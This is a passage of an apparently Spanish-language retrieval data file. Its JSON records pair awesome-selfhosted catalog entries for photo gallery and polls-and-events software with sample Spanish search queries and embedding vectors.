-0.07574, -0.02699, -0.0058, -0.02609, -0.10658, 0.02247, 0.00646, 0.03594, -0.13328, -0.04283, 0.09007, 0.04913, 0.02275, 0.03734, 0.01839, -0.08494, -0.02016, 0.05315, -0.07392, -0.01948, 0.00691, -0.02339, 0.04511, 0.07291, 0.05334, 0.02481, -0.02544, -0.03007, 0.02458, 0.03712, 0.03217, -0.06327, 0.03747, -0.00774, -0.02486, 0.05237, 0.04092, -0.06081, -0.10033, -0.00927, 0.06127, -0.02997, 0.04494, 0.08222, 0.04106, 0.00149, -0.02422, -0.00455, 0.08622, -0.02605, -0.0513, -0.00546, -0.02132, -0.03223, 0.03712, 0.08676, -0.03244, -0.04442, 0.04312, 0.01546, -0.03197, -0.01125, -0.08007, -0.00662, 0.02347, 0.02708, 0.00653, -0.03185, 0.02668, 0.07113, 0.0164, -0.01574, 0.01882, 0.09017, -0.0563, -0.03306, 0.0316, 0.08107, 0.01065, 0.00958, 0.02142, 0.00221, 0.01411, 0.03997, 0.09364, -0.01396, 0.01159, -0.02251, -0.0065, 0.04608, -0.03196, -0.01959, 0.02597, -0.03947, -0.05026, 0.03092, -0.03674, -0.01203, -0.00653, -0.02764, -0.1112, 0.04869, 0.05826, -0.01499, -0.02773, -0.04084, -0.02655, -0.01201, -0.00513, -0.00756, -0.02847, 0.00815, -0.02231, -0.01841, -0.06402, -0.0064, -0.02885]} +{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Photoview β€” Simple and user-friendly photo gallery for personal servers. It is made for photographers and aims to provide an easy and fast way to navigate directories, with thousands of high resolution photos [GPL-3.0, Go/Docker]. PiGallery 2 β€” Directory-first photo gallery website, with a rich UI, optimised for running on low resource servers [MIT, Docker/Nodejs]. Piwigo β€” Photo gallery software for the web, built by an active community of users and developers [GPL-2.0, PHP]. sigal β€” Yet another simple static gallery generator [MIT, Python]. SPIS β€” A simple, lightweight and fast media server with decent mobile support [GPL-3.0, Docker/Rust]. This week in past β€” Aggregates images taken this week, from previous years and presents them on a web page with a simple slideshow [MIT, Docker/Rust]. Thumbor β€” A smart imaging service and enables on-demand cropping, resizing, applying filters and optimizing images [MIT, Python/Docker]. Zenphoto β€” Open-source gallery and CMS project [GPL-2.0, PHP].", "indexar": "con quΓ© puedo crear una pΓ‘gina web que muestre mis fotos con un diseΓ±o moderno y rΓ‘pido?", "v": [-0.0894, 0.11681, -0.07545, -0.09332, -0.07057, -0.02444, -0.14158, 0.02427, -0.10338, -0.1707, -0.11112, -0.09922, -0.05638, -0.10441, 0.04832, -0.03413, 0.11584, -0.01041, 0.08595, -0.0542, -0.01048, -0.03422, -0.06711, -0.13608, 0.02727, -0.16964, 0.03122, 0.03267, -0.16992, 0.04527, 0.00286, 0.04748, 0.02383, 0.04958, -0.02492, -0.07609, 0.18927, 0.0873, -0.06078, 0.08621, -0.00841, -0.04363, -0.02778, 0.13794, 0.00542, 0.00357, -0.00486, -0.11251, -0.11413, 0.13722, 0.03474, 0.03149, -0.04769, 0.07779, -0.04965, -0.08909, 0.11672, -0.11095, 0.09285, -0.05175, 0.00842, 0.11799, -0.10814, -0.03689, 0.00435, 0.00814, -0.10636, -0.01496, 0.02944, -0.02891, 0.04239, -0.05433, 0.11291, -0.06412, 0.03521, 0.00701, -0.10849, -0.02513, -0.02354, 0.04222, -0.02605, 0.06431, -0.05652, -0.08954, -0.06899, 0.0453, -0.05495, 0.00508, -0.01098, -0.02649, 0.13813, 0.01993, 0.05281, -0.04941, -0.03428, -0.04657, 0.00386, 0.00082, 0.06078, -0.02497, -0.14982, -0.04643, -0.08683, 0.00297, -0.00799, -0.02925, 0.07351, 0.03053, -0.09616, -0.07407, -0.04078, -0.02767, -0.01433, -0.0714, -0.04699, 0.01621, -0.00265, 0.04198, -0.07103, -0.08846, -0.01387, -0.04713, 0.02054, 0.01216, -0.01153, -0.00728, -0.00555, 0.03257, -0.07072, 0.04026, -0.07433, -0.0983, -0.05792, -0.0583, 0.10154, 0.06545, -0.04752, -0.00928, 0.02626, -0.05978, -0.02153, 0.00043, -0.06185, -0.08832, -0.10135, -0.02627, 0.03227, -0.05565, -0.13922, 0.06309, -0.06119, 0.08944, 0.0472, 0.00958, -0.07752, 0.01936, -0.02154, -0.01843, 0.01691, -0.00426, -0.10409, 0.04929, 0.04908, 0.03967, -0.01625, -0.06324, -0.12659, 0.03043, -0.00788, 0.05787, -0.00232, -0.00903, -0.0343, -0.06573, 0.08666, 0.03471, -0.03082, -0.04203, 0.04183, 0.00967, -0.04989, 0.02145, -0.06955, 0.0259, -0.01936, -0.03689, 0.06654, 0.06307, -0.04285, -0.01221, -0.00467, 0.02667, -0.0099, 0.04898, 0.03035, 0.04878, 0.01352, 0.01918, 0.02686, -0.0632, 0.01042, -0.12807, 0.0371, -0.01306, -0.07753, 0.00272, 0.01304, 0.05559, -0.00425, 0.00386, 0.00239, -0.04205, 0.05047, -0.07807, -0.03644, 0.03491, 0.07521, -0.02682, -0.00543, -0.06817, 0.07196, 0.02021, -0.02787, 0.04515, 0.09025, 0.03464, -0.04382, -0.03023, 0.02591, -0.02061, -0.01084, -0.00216, -0.08087, -0.02527, 0.02422, 0.01703, 0.01088, -0.02953, -0.11404, -0.01439, 0.0042, 0.02591, -0.04141, 0.04661, -0.00963, -0.01576, -0.0805, -0.01751, -0.04027, -0.07876, -0.03335, 0.00183, -0.01642, -0.06626, 0.02201, 0.01311]} +{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Photoview β€” Simple and user-friendly photo gallery for personal servers. It is made for photographers and aims to provide an easy and fast way to navigate directories, with thousands of high resolution photos [GPL-3.0, Go/Docker]. PiGallery 2 β€” Directory-first photo gallery website, with a rich UI, optimised for running on low resource servers [MIT, Docker/Nodejs]. Piwigo β€” Photo gallery software for the web, built by an active community of users and developers [GPL-2.0, PHP]. sigal β€” Yet another simple static gallery generator [MIT, Python]. SPIS β€” A simple, lightweight and fast media server with decent mobile support [GPL-3.0, Docker/Rust]. This week in past β€” Aggregates images taken this week, from previous years and presents them on a web page with a simple slideshow [MIT, Docker/Rust]. Thumbor β€” A smart imaging service and enables on-demand cropping, resizing, applying filters and optimizing images [MIT, Python/Docker]. Zenphoto β€” Open-source gallery and CMS project [GPL-2.0, PHP].", "indexar": "necesito una herramienta para generar galerΓ­as estΓ‘ticas, cuΓ‘l es la mejor opciΓ³n libre?", "v": [0.22043, 0.03292, -0.15109, -0.01651, 0.05625, -0.14714, -0.03391, -0.08467, -0.05315, -0.08397, -0.0412, -0.07159, -0.11867, 0.04026, 0.09079, 0.08456, -0.01662, -0.12319, -0.04203, 0.13048, -0.14713, 0.01492, -0.07123, -0.09881, -0.05755, -0.08078, 0.08211, -0.14454, -0.23291, 0.11152, 0.04089, 0.01871, 0.00851, -0.2087, -0.01397, -0.128, 0.01697, 0.00959, -0.02973, -0.01182, -0.015, 0.05319, -0.02237, 0.05173, 0.02267, -0.07355, -0.07102, 0.01323, -0.11749, 0.09599, 0.03521, -0.02327, -0.03105, 0.04094, 0.03457, -0.16776, 0.18861, -0.07737, -0.03275, -0.07123, -0.02927, 0.05116, 0.00923, -0.00486, -0.07585, 0.01835, -0.03234, -0.01669, -0.08178, 0.00602, -0.02564, 0.02791, 0.03242, 0.06553, -0.051, 0.09702, 0.00589, -0.0645, -0.03289, 0.03188, 0.09425, 0.0266, -0.01389, 0.03838, -0.07992, -0.09435, 0.07132, -0.08436, 0.01413, -0.07366, 0.02991, -0.02194, -0.09526, 0.11069, 0.02717, -0.098, 0.00337, 0.06692, 0.04687, 0.05784, 0.14868, -0.05378, -0.09142, -0.02785, 0.0202, -0.02613, 0.01496, -0.05163, -0.0729, -0.00235, 0.03389, 0.008, 0.07887, -0.01526, -0.01499, 0.02359, -0.02269, -0.07509, -0.00128, -0.00322, 0.04578, 0.02036, -0.04343, -0.1104, -0.01572, 0.00238, 3e-05, 0.07797, 0.0041, -0.00663, -0.03584, -0.00966, -0.08758, -0.06176, -0.0347, 0.004, 0.07098, -0.06936, -0.00385, -0.05, -0.03634, 0.05713, 0.02, -0.11997, 0.04145, -0.01545, -0.00994, -0.05403, -0.07916, 0.00037, -0.00551, -0.08723, 0.12174, 0.01817, -0.00534, 0.03166, -0.06896, -0.08001, -0.00084, 0.03866, 0.01396, -0.01017, 0.01745, 0.00389, -0.00945, -0.05586, -0.04828, 0.02019, -0.02865, 0.00441, 0.02932, 0.00103, 0.00763, -0.0535, 0.01155, -0.04804, -0.0553, -0.06089, -0.01018, -0.08142, -0.0166, -0.00669, -0.08858, -0.03551, -0.0428, -0.07061, 0.03619, -0.00104, 0.05565, 0.05956, -0.02116, 0.0017, -0.02892, -0.06001, 0.04423, -0.02286, 0.01478, -0.02378, 0.01808, 0.02413, -0.05586, -0.04774, -0.02981, -0.03361, 0.08615, 0.05519, -0.05484, 0.03873, 0.00799, 0.01794, 0.03736, -0.03108, 0.03431, -0.08261, -0.01528, 0.00678, 0.00102, -0.02765, -0.01368, -0.01619, 0.09864, 0.03519, 0.04608, -0.01639, 0.01726, 0.05775, 0.03373, 0.03337, -0.00869, 0.00308, 0.01247, 0.03555, -0.01474, -0.02538, 0.08636, -0.02777, 0.04783, -0.03857, -0.01307, -0.0254, 0.07659, 0.09408, -0.04837, 0.00726, -0.02495, -0.03239, -0.06046, 0.0145, -0.02235, -0.12716, -0.0291, 0.05684, 0.05246, -0.04929, 0.02137, -0.04897]} +{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Bitpoll β€” Conduct polls about dates, times or general questions [GPL-3.0, Docker/Python]. Bracket β€” Flexible tournament system to build a tournament setup, add teams, schedule matches, keep track of scores and present ranking live to the public [AGPL-3.0, Docker/Nodejs]. Christmas Community β€” Create a simple place for your entire family to use to find gifts that people want, and to avoid double-gifting [AGPL-3.0, Docker/Nodejs]. Claper β€” The ultimate tool to interact with your audience (alternative to Slido, AhaSlides and Mentimeter) [GPL-3.0, Elixir/Docker]. ClearFlask β€” Community-feedback tool for managing incoming feedback and prioritizing a public roadmap (alternative to Canny, UserVoice, Upvoty) [AGPL-3.0, Docker]. docassemble β€” A free, open-source expert system for guided interviews and document assembly, based on Python, YAML, and Markdown [MIT, Docker/Python]. EventSchedule β€” Share events, sell tickets, and bring communities together [AAL, PHP/Docker].", "indexar": "que programa sirve para realizar encuestas sobre fechas y horas sin pagar", "v": [0.07124, 0.10201, -0.08503, -0.09506, 0.12148, -0.08635, 0.0836, -0.08015, -0.10356, -0.11844, -0.0806, -0.01901, 0.05714, -0.0771, -0.01444, 0.0644, 0.03232, 0.02092, 0.1567, 0.06655, 0.0221, -0.03703, 0.03719, -0.06283, -0.15044, 0.04233, 0.05966, -0.06785, -0.07394, -0.00647, 0.0571, -0.02803, 0.03437, -0.07128, 0.08497, 0.07816, 0.07527, 0.18195, -0.05294, -0.05903, 0.0565, 0.01747, -0.05787, -0.04336, 0.02329, -0.03396, 0.03333, 0.07399, -0.00226, -0.17516, -0.04889, 0.06552, -0.01646, 0.06835, -0.03511, -0.00863, -0.02868, -0.12922, -0.05041, -0.0327, -0.00681, 0.03875, 0.14169, 0.07539, 0.05384, 0.03421, 0.07308, 0.01161, 0.06256, -0.01163, -0.1083, 0.01424, 0.00371, 0.05951, -0.02445, -0.00778, 0.00372, -0.02456, -0.03826, -0.08624, 0.02319, -0.03479, -0.03867, 0.13509, -0.12832, 0.06475, 0.07749, -0.07072, -0.06862, -0.02336, 0.00738, 0.12591, 0.04353, 0.1384, -0.02243, -0.05668, 0.11939, -0.03761, 0.08587, 0.04084, 0.05103, -0.08257, 0.00095, 0.05723, -0.03359, 0.10374, 0.08954, 0.01444, -0.02866, 0.0586, 0.03541, 0.02047, -0.13648, -0.08583, -0.02792, 0.00707, 0.0395, 0.02617, 0.0263, -0.05489, -0.01013, 0.10081, -0.04066, -0.02501, 0.01075, -0.05237, 0.06534, 0.03039, 0.02951, 0.06283, 0.00232, 0.04545, -0.03328, 0.00674, -0.02217, -0.07533, 0.01238, 0.01893, -0.00565, -0.04887, 0.11512, 0.13739, 0.05152, -0.00658, 0.10752, 0.00367, -0.03328, -0.09908, -0.07666, -0.00283, -0.0028, -0.01079, 0.05838, 0.10655, -0.01405, -0.16257, 0.00239, -0.02243, -0.0624, 0.06552, -0.01031, -0.00909, -0.02247, -0.0657, 0.12163, -0.0247, -0.0437, -0.02678, 0.08182, 0.11148, 0.05164, 0.09829, 0.02433, -0.04672, 0.02982, -0.0114, 0.02204, -0.03895, 0.0225, -0.07015, -0.05169, 0.0829, 0.04121, -0.01688, -0.03235, -0.00225, 0.03641, 0.00554, 0.01343, -0.03514, -0.01158, -0.06751, 0.07087, 0.03462, 0.0362, -0.04069, -0.00047, 0.01187, 0.01862, 0.00478, -0.11323, 0.01793, -0.0295, 0.01271, -0.02765, 0.07007, -0.04007, 0.07979, 0.04672, 0.08059, 0.00635, 0.00242, 0.01243, -0.03829, 0.01637, -0.03964, 0.07722, -0.0197, -0.04111, 0.07877, -0.02642, 0.05972, 0.04122, 0.03656, -0.02453, 0.00541, 0.10152, 0.05852, 0.09055, -0.01464, -0.01137, -0.02068, -0.02076, -0.03275, 0.04169, -0.04371, 0.05981, -0.04525, -0.00703, -0.12909, 0.04072, 0.05508, -0.05299, -0.04567, -0.03328, -0.02655, -0.03785, -0.02036, 0.00345, -0.06903, -0.07388, 0.05904, 0.04464, -0.01982, 0.09986, -0.0328]} +{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Bitpoll β€” Conduct polls about dates, times or general questions [GPL-3.0, Docker/Python]. Bracket β€” Flexible tournament system to build a tournament setup, add teams, schedule matches, keep track of scores and present ranking live to the public [AGPL-3.0, Docker/Nodejs]. Christmas Community β€” Create a simple place for your entire family to use to find gifts that people want, and to avoid double-gifting [AGPL-3.0, Docker/Nodejs]. Claper β€” The ultimate tool to interact with your audience (alternative to Slido, AhaSlides and Mentimeter) [GPL-3.0, Elixir/Docker]. ClearFlask β€” Community-feedback tool for managing incoming feedback and prioritizing a public roadmap (alternative to Canny, UserVoice, Upvoty) [AGPL-3.0, Docker]. docassemble β€” A free, open-source expert system for guided interviews and document assembly, based on Python, YAML, and Markdown [MIT, Docker/Python]. EventSchedule β€” Share events, sell tickets, and bring communities together [AAL, PHP/Docker].", "indexar": "con que puedo montar un sistema de torneos flexible donde se actualizan los rankings en vivo", "v": [0.15957, 0.06557, -0.20794, -0.05692, 0.02442, -0.03956, 0.01559, -0.05476, -0.08554, -0.19155, -0.0812, -0.07435, 0.10122, 0.0427, 0.09558, 0.06769, 0.03495, -0.1004, 0.11631, 0.00355, -0.05485, -0.1674, -0.10702, -0.09784, 0.06615, -0.03474, 0.06158, -0.05685, -0.16712, 0.04702, 0.05639, 0.08471, 0.09439, -0.01516, 0.06297, -0.0685, 0.04241, 0.08178, -0.11437, -0.09244, -0.01607, -0.08276, -0.03536, -0.07876, 0.04463, 0.00691, -0.04945, 0.01627, 0.00723, -0.12878, 0.02854, 0.06185, 0.01684, -0.12111, 0.01474, -0.10994, 0.05397, -0.10875, 0.04694, -0.04536, -0.02628, 0.07675, 0.00851, 0.02792, 0.02251, 0.09749, -0.01629, -0.0862, -0.00054, 0.04507, -0.03638, -0.05546, 0.05507, 0.09239, -0.07191, 0.16401, 0.08325, -0.02317, 0.00703, 0.05623, -0.00574, -0.02794, -0.10902, 0.15955, -0.05556, -0.04348, 0.05437, -0.02892, -0.03929, -0.05187, 0.07398, -0.05479, -0.01854, 0.10545, -0.01995, -0.03942, 0.05505, 0.06205, -0.00239, -0.04838, -0.00626, 0.07595, -0.01421, 0.04118, -0.05306, -0.05109, 0.06871, -0.07124, 0.03496, -0.02475, 0.065, 0.04521, -0.0785, 0.01007, -0.02309, 0.03829, -0.12094, 0.1067, 0.01825, -0.00814, -0.08326, -0.01129, -0.01973, -0.04946, -0.00338, 0.06053, 0.02122, 0.05292, -0.00163, -0.03275, 0.0328, -0.02092, -0.0749, -0.01528, 0.01127, -0.00246, 0.02499, 0.1009, -0.00662, 0.03459, -0.0539, 0.10614, -0.00538, -0.12944, 0.06437, 0.02025, 0.00356, -0.1038, -0.08422, 0.03513, -0.03204, 0.08732, 0.04951, 0.04209, -0.01851, -0.01364, 0.00037, -0.11592, -0.00851, 0.0199, 0.01566, 0.00094, 0.00366, 0.04119, -0.02543, 0.05804, 0.0182, -0.0015, 0.12607, 0.03869, -0.01829, 0.064, 0.00038, -0.02354, 0.01942, -0.0067, -0.03835, -0.04516, -0.00401, -0.03169, -0.05238, 0.04285, -0.02028, -0.06315, -0.12846, 0.02726, 0.01339, 0.07074, 0.02085, 0.07206, 0.06597, 0.07722, -0.02062, 0.02483, 0.07182, -0.03084, -0.00195, -0.07745, -0.03488, -0.06435, -0.05625, -0.02468, 0.0078, -0.06887, 0.00824, 0.07654, 0.02478, 0.07157, 0.03628, 0.09998, -0.02884, -0.02775, 0.03047, -0.01896, -0.0177, -0.02902, 0.02203, -0.03457, 0.03723, -0.01913, 0.04747, -0.01325, 0.07068, -0.05331, -0.01092, -0.01611, -0.01437, 0.03443, 0.08385, -0.04201, -0.02679, -0.00422, -0.01553, 0.00249, 0.04996, 0.04344, 0.05038, 0.00698, -0.03795, -0.02556, 0.02122, 0.0469, -0.00377, -0.04542, 0.02354, -0.06843, -0.09162, -0.02863, 0.01283, -0.12756, -0.07269, 0.03198, 0.01813, -0.08012, 0.01425, -0.01378]} +{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Bitpoll β€” Conduct polls about dates, times or general questions [GPL-3.0, Docker/Python]. Bracket β€” Flexible tournament system to build a tournament setup, add teams, schedule matches, keep track of scores and present ranking live to the public [AGPL-3.0, Docker/Nodejs]. Christmas Community β€” Create a simple place for your entire family to use to find gifts that people want, and to avoid double-gifting [AGPL-3.0, Docker/Nodejs]. Claper β€” The ultimate tool to interact with your audience (alternative to Slido, AhaSlides and Mentimeter) [GPL-3.0, Elixir/Docker]. ClearFlask β€” Community-feedback tool for managing incoming feedback and prioritizing a public roadmap (alternative to Canny, UserVoice, Upvoty) [AGPL-3.0, Docker]. docassemble β€” A free, open-source expert system for guided interviews and document assembly, based on Python, YAML, and Markdown [MIT, Docker/Python]. EventSchedule β€” Share events, sell tickets, and bring communities together [AAL, PHP/Docker].", "indexar": "cual es una alternativa libre a Mentimeter para interactuar con la audiencia", "v": [0.00849, 0.1491, -0.10925, -0.09314, -0.03191, 0.04865, -0.16046, 0.02476, -0.13923, -0.03165, -0.0003, -0.16859, 0.01157, 0.09033, 0.0859, 0.02681, 0.13085, -0.00702, 0.12895, -0.02397, 0.01702, 0.03286, -0.03527, -0.10435, -0.10274, -0.03511, -0.04037, 0.01514, 0.10295, 8e-05, -0.05405, -0.03909, 0.05663, -0.02702, -0.04208, -0.08808, 0.08177, 0.10978, 0.11023, 0.0247, -0.03065, 0.00501, -0.03804, 0.0292, 0.09488, 0.01802, -0.15579, 0.06929, -0.00614, 0.02218, -0.10057, 0.07088, -0.09385, 0.10364, 0.0585, -0.05667, 0.13642, -0.12954, 0.04533, -0.07155, -0.07763, -0.05053, -0.01321, -0.0165, 0.02428, -0.01387, -0.06281, 0.00291, -0.08536, 0.07727, 0.04011, -0.0185, -0.08379, 0.02079, -0.0323, 0.18522, -0.10007, -0.06633, -0.03024, 0.02572, -0.03712, -0.03994, 0.11127, 0.0067, -0.02368, -0.02644, 0.08962, -0.12404, -0.10955, 0.14176, 0.07233, 0.05498, 0.00228, 0.03895, -0.07297, -0.11629, -0.00261, 0.06822, -0.04482, 0.07741, 0.09721, 0.07296, -0.18596, -0.09763, 0.00448, -0.03463, -0.03753, 0.00459, -0.10844, 0.00967, 0.04932, 0.08182, -0.02489, -0.05047, -0.07148, -0.04223, -0.0173, -0.00386, -0.03149, 0.01272, -0.04798, 0.02849, -0.05225, -0.07728, 0.01996, 0.02982, 0.05152, -0.01406, -0.06615, 0.06304, 0.08742, -0.04906, 0.00671, -0.10823, 0.00728, -0.0942, 0.03109, -0.07231, -0.02191, 0.02392, 0.03179, 0.00536, 0.0056, -0.06969, 0.02433, -0.11579, 0.04566, -0.01992, -0.03953, 0.00034, -0.00737, 0.02192, 0.02551, 0.06493, 0.01307, -0.02528, -0.08681, 0.03463, 0.01156, 0.05111, -0.04898, -0.08922, 0.07068, 0.03302, 0.03897, -0.077, -0.09224, -0.08264, -0.02515, -0.0014, -0.01547, 0.04111, 0.074, -0.07453, -0.02977, 0.01476, -0.01912, -0.07873, 0.02128, -0.07201, 0.00215, -0.01183, -0.024, -0.04852, -0.04022, -0.0603, -0.07838, -0.03894, -0.00045, 0.07844, -0.00707, 0.05774, -0.03897, -0.07895, 0.00568, -0.01497, 0.04568, -0.07438, 0.00252, 0.00912, -0.03592, 0.01617, -0.02777, -0.03281, -0.03192, -0.0068, 0.04831, 0.02051, -0.00223, 0.04005, 0.0891, -0.03487, 0.09216, 0.02677, -0.03442, 0.01582, 0.03572, -0.03024, 0.01539, 0.09773, 0.04591, -0.00157, 0.02379, -0.03628, -0.03642, -0.008, 0.08078, 0.00215, -0.05486, -0.01919, -0.04512, -0.03683, 0.06224, 0.05439, 0.03124, 0.01633, -0.02476, -0.00514, 0.02287, -0.04456, 0.01847, 0.07479, -0.02926, 0.03786, 0.01913, 0.04643, -0.08235, 0.04874, -0.05948, -0.06633, -0.06379, 0.04027, -0.00684, -0.01647, 0.05615, -0.02069]} +{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Fider β€” Open platform to collect and prioritize feedback (alternative to UserVoice) [MIT, Docker]. Formbricks β€” Experience Management Suite built on the largest open source survey stack worldwide. Gracefully gather feedback at every step of the customer journey to know what your customers need [AGPL-3.0, Nodejs/Docker]. Framadate β€” Online service for planning an appointment or make a decision quickly and easily: Make a poll, Define dates or subjects to choose, Send the poll link to your friends or colleagues, Discuss and make a decision [CECILL-B, PHP]. Gancio β€” Local community event and agenda sharing [AGPL-3.0, Nodejs]. gathio β€” Self-destructing, shareable, no-registration event pages [GPL-3.0, Nodejs/Docker]. HeyForm β€” Form builder that allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls [AGPL-3.0, Docker]. hitobito β€” Manage complex group hierarchies with members, events and a lot more [AGPL-3.0, Ruby].", "indexar": "que herramienta sirve para crear encuestas y recopilar feedback de los clientes?", "v": [0.12355, 0.12745, -0.13794, -0.21325, 0.10792, -0.18065, -0.04686, 0.0002, 0.00265, -0.20638, -0.08254, -0.02779, 0.02767, -0.11408, 0.07563, 0.03562, 0.05383, -0.03721, 0.10208, 0.08716, 0.06391, 0.00711, -0.09266, -0.09346, -0.16769, -0.02073, 0.02378, -0.06088, -0.04596, 0.12554, 0.04746, -0.05204, -0.03789, 0.03103, -0.1176, -0.02866, 0.00746, 0.09115, -0.02289, 0.0195, 0.02817, 0.01159, -0.10248, -0.0168, -0.00958, -0.00103, -0.03732, 0.03141, -0.01841, 0.01065, -0.06782, -0.10109, -0.18472, -0.00805, -0.00273, -0.07815, 0.12468, -0.13708, 0.10118, -0.08415, -0.08143, 0.01157, 0.05232, 0.01091, 0.03063, -0.02119, 0.03093, -0.15581, 0.01082, 0.03971, -0.06037, 0.07824, 0.02566, -0.03847, 0.02308, 0.03141, -0.00778, 0.02565, -0.05453, -0.02504, 0.02775, -0.08043, -0.09692, -0.03881, -0.06049, -0.03923, 0.05084, -0.03113, -0.02683, -0.05955, -0.02892, 0.05031, -0.02812, 0.0375, -0.06579, -0.01476, 0.12636, -0.07788, 0.03713, 0.04181, 0.03139, -0.12411, -0.01005, 0.07122, 0.00789, 0.04798, 0.00651, -0.08819, -0.05379, 0.03904, 0.07287, 0.05797, 0.00452, 0.00628, 0.05245, -0.01082, 0.00985, -0.03028, -0.01499, -0.02243, 0.06826, 0.13854, -0.06775, -0.06834, -0.1018, -0.02023, 0.02661, -0.0226, 0.05216, -0.05529, -0.00308, -0.03808, -0.06339, 0.07794, 0.05952, -0.03129, 0.03009, -0.03673, 0.02027, -0.07363, 0.01649, 0.09931, -0.00842, -0.11736, 0.08584, -0.02774, 0.04137, -0.0276, 0.00692, 0.00588, 0.02898, -0.00066, 0.00536, -0.01393, -0.02609, -0.09772, 0.00264, -0.05189, -0.06886, 0.07889, -0.00962, -0.04126, 0.06163, 0.07541, 0.06117, -0.04414, 0.01374, -0.05318, 0.135, 0.03599, 0.03383, -0.00885, 0.06576, -0.08469, 0.05825, 0.03872, -0.02602, 0.02919, -0.01984, -0.08007, -0.0267, -0.02719, -0.00457, -0.00562, 0.04817, -0.01644, 0.06491, -0.01016, 0.01163, 0.01358, -0.071, 0.00664, 0.03945, -0.0663, 0.09359, -0.03672, 0.05183, -0.00917, 0.02585, 0.01423, -0.06551, -0.01202, -0.0174, -0.01931, -0.04891, 0.06826, -0.03915, 0.05991, 0.0568, 0.01683, 0.05587, -0.057, 0.01269, -0.03074, 0.05322, -0.02323, 0.0211, -0.02271, -0.03929, -0.02007, -0.00968, -0.02159, 0.02108, -0.00066, -0.02444, 0.07255, 0.06859, 0.0214, 0.06109, -0.00044, 0.08323, -0.04746, -0.0401, -0.04215, -0.00403, -0.05162, 0.07836, -0.01295, -0.02989, -0.09331, 0.04661, 0.05582, -0.04795, -0.01996, -0.00824, -0.05643, 0.01702, 0.00406, -0.05985, -0.13561, -0.07304, -0.00054, 0.06594, -0.00536, 0.08209, -0.05234]} +{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Fider β€” Open platform to collect and prioritize feedback (alternative to UserVoice) [MIT, Docker]. Formbricks β€” Experience Management Suite built on the largest open source survey stack worldwide. Gracefully gather feedback at every step of the customer journey to know what your customers need [AGPL-3.0, Nodejs/Docker]. Framadate β€” Online service for planning an appointment or make a decision quickly and easily: Make a poll, Define dates or subjects to choose, Send the poll link to your friends or colleagues, Discuss and make a decision [CECILL-B, PHP]. Gancio β€” Local community event and agenda sharing [AGPL-3.0, Nodejs]. gathio β€” Self-destructing, shareable, no-registration event pages [GPL-3.0, Nodejs/Docker]. HeyForm β€” Form builder that allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls [AGPL-3.0, Docker]. hitobito β€” Manage complex group hierarchies with members, events and a lot more [AGPL-3.0, Ruby].", "indexar": "con que puedo montar un sistema para organizar eventos locales dentro de mi comunidad?", "v": [0.01097, 0.18835, -0.17595, -0.18156, -0.1473, -0.07144, 0.00154, 0.0743, -0.15312, -0.16027, -0.21434, -0.00115, 0.10126, -0.04342, 0.0769, 0.04282, 0.10132, -0.09046, 0.00261, 0.01436, -0.18018, 0.01854, -0.02764, 0.08009, 0.0714, -0.07058, 0.10474, -0.09611, -0.09671, -0.00138, 0.01368, 0.09291, 0.00945, 0.00556, 0.01078, -0.12454, 0.03875, 0.03787, -0.11233, -0.12829, -0.0784, -0.01165, -0.06077, -0.02525, 0.03246, -0.01618, -0.02304, -0.02312, -0.03778, -0.06552, -0.04254, 0.01769, -0.06412, -0.03193, 0.03251, -0.0836, -0.10681, -0.13709, -0.01021, 0.00989, -0.06441, -0.05273, -0.07274, 0.09031, 0.10588, 0.08742, -0.02924, 0.01032, -0.03861, 0.04008, -0.08156, -0.07669, 0.06416, -0.00419, -0.03933, 0.07524, 0.07661, 0.02231, 0.02749, 0.04475, -0.0144, 0.06685, 0.01887, 0.11352, -0.01402, -0.05302, -0.02308, -0.10551, 0.09287, 0.05461, 0.04459, -0.0408, 0.10053, -0.02845, 0.01363, -0.13316, 0.10152, 0.13994, -0.04714, 0.05557, -0.06003, -0.0864, -0.03732, 0.07732, -0.00226, -0.10649, 0.07259, 0.07836, 0.15884, -0.0656, 0.02965, 0.04189, -0.02042, 0.01507, -0.08985, -0.08618, 0.05327, 0.07446, 0.05235, 0.08595, -0.04312, 0.00311, 0.0667, -0.06419, 0.03432, 0.04339, 0.04752, 0.10251, 0.01696, 0.04144, 0.05682, 0.00431, -0.01577, 0.03459, -0.02034, -0.0092, -0.03744, -0.02732, 0.02408, 0.03741, -0.01474, 0.00662, -0.01766, -0.08951, 0.07371, 0.01251, 0.04301, -0.05346, -0.00789, 0.03288, 0.0144, 0.04874, -0.04053, -0.04637, -0.09212, -0.04419, 0.0386, -0.08019, 0.09023, -0.02376, 0.00115, 